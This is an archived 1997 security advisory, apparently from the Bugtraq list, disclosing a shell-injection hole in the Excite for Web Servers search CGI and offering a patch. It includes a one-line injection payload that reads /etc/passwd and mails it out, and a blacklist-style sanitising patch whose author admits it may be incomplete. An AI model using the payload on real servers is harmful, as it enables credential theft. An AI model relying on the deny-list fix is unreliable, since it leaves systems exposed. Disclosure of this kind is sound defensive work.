EWS (Excite for Web Servers) CGI hole

Summary
Description:A classic CGI mistake: CWS launches a shell with query results. They change spaces to $ and somehow think this solves the problem ;)
Author:Marc Merlin <marc_merlin@MAGIC.METAWIRE.COM>
Compromise:run arbitrary commands as the processid that runs the webserver (remote)
Vulnerable Systems:Those running EWS 1.1 on both UNIX and NT
Date:17 December 1997
Details


Date: Wed, 17 Dec 1997 23:04:46 -0800
From: Marc Merlin <marc_merlin@MAGIC.METAWIRE.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: CGI security hole in EWS (Excite for Web Servers)

I tried a query like this one on a server where I was configuring:
"this and this and that" (with the quotes) and noticed an error, so I looked
at the code.
Classic mistake, it launches a shell with whatever was given in the query
(even though spaces are escaped with a '$').

Yet, the exploit remains simple:

";IFS="$";/bin/cat /etc/passwd|mail your_email_here;
(or any other shell command you can thing of)

I found the problem on what I was told was EWS 1.1 (from what I was told as
I did not install it, but merely tweaked it).
It's supposed to be from http://www.excite.com/navigate/


Here's a patch that fixes the problem in two places.
(this library is typically in ews/ews/architext_query.pl)

--- architext_query.pl  1997/12/09 00:30:13     1.4
+++ architext_query.pl  1997/12/12 21:25:31     1.7
@@ -223,8 +233,23 @@

     ## do the search
     $timeout = "-to $maximum_query_time" if $maximum_query_time;
+    # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes
+    # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc
+    $query =~ s/\`//mg;
+    $query =~ s/\n//mg;
+    $query =~ s/\$//mg;
+    $query =~ s/\^//mg;
+    $query =~ s/\|//mg;
+    $query =~ s/\\//mg;
+    $query =~ s/\~//mg;
+    $query =~ s/\&//mg;
+    $query =~ s/\;//mg;
+    $query =~ s/\*//mg;
+    # Quote double quotes
+    $query =~ s/"/\\"/mg;
     $qcommand = "$queryprog -C $configfile $timeout -q \"$query\" -num $max_docs_to_return $syntax_flag";
     $qcommand = &convert_file_names($qcommand);
+    #print "Command: $qcommand<BR>\n";
     ## print $qcommand;
        if (open(QUERY, "$qcommand |")) {
        ## Accumulate the results.
@@ -585,8 +610,24 @@
     $urledit = $form{'urledit'};

     $timeout = "-to $maximum_query_time" if $maximum_query_time;
+
+    # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes
+    # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc
+    $query =~ s/\`//mg;
+    $query =~ s/\n//mg;
+    $query =~ s/\$//mg;
+    $query =~ s/\^//mg;
+    $query =~ s/\|//mg;
+    $query =~ s/\\//mg;
+    $query =~ s/\~//mg;
+    $query =~ s/\&//mg;
+    $query =~ s/\;//mg;
+    $query =~ s/\*//mg;
+    # Quote double quotes
+    $query =~ s/"/\\"/mg;
     $qcommand = "$queryprog -C $configfile $timeout -q \"$query\"";
     $qcommand = &convert_file_names($qcommand);
+    #print "Command: $qcommand<BR>\n";

     if (open(QUERY, "$qcommand |")) {

Note that this is  what I found after a quick look,  but other libraries may
have similar  bugs (like the  architext.pl library but  it's not used  on my
system, it looks like junk left around in the Excite distribution (there are
many such files)).

Marc

PS: Sorry, I can't follow the list too  closely right now, so if you want to
make sure  I see  your message cc  it to  me (and if  you mail  me directly,
replace "_" by "." between my firstname  and lastname as my spam filters can
only  redirect answers  to  my  messages, not  a  new  message written  from
scratch).
--
Home page: http://www.efrei.fr/~merlin/ (browser friendly)
Finger merlin@magic.metawire.com for PGP key (key id 763BE901)
***** "God is real, unless declared integer." *****

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]